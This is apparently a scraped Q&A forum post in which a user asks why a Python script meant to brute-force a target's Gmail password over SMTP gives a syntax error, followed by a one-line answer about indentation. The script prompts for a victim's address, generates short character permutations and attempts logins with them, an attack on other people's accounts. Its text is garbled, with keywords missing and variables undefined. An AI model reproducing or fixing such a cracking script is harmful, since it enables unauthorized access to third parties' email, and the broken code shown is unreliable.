smtp - A basic gmail BruteForce program in python -

i trying figure out why isn't code working. trying improve python skill adding code another, when tried execute keeps giving me syntax error.

import itertools  import smtplib  smtpserver = smtplib.smtp("", 587) smtpserver.ehlo() smtpserver.starttls()  user = raw_input("enter target's gmail address: ") def print_perms(chars, minlen, maxlen):      n in range(minlen, maxlen+1):          perm in itertools.product(chars, repeat=n):              print(''.join(perm))   print_perms("abcdefghijklmnopqrstuvwxyz1234567890", 2, 4)  symbols in print_perms:     try:         smtpserver.login(user, password)          print "[+] password cracked: %s" % symbols         break;         except smtplib.smtpauthenticationerror:             print "[!] password inccorect: %s" % symbols 

the output is

file "", line 22                                                                                                                                                            except smtplib.smtpauthenticationerror:                                                                                                                                               ^                                                                                                                                                                       syntaxerror: invalid syntax  

i don't understand, may discover , patch problem


except should @ same indent level try.


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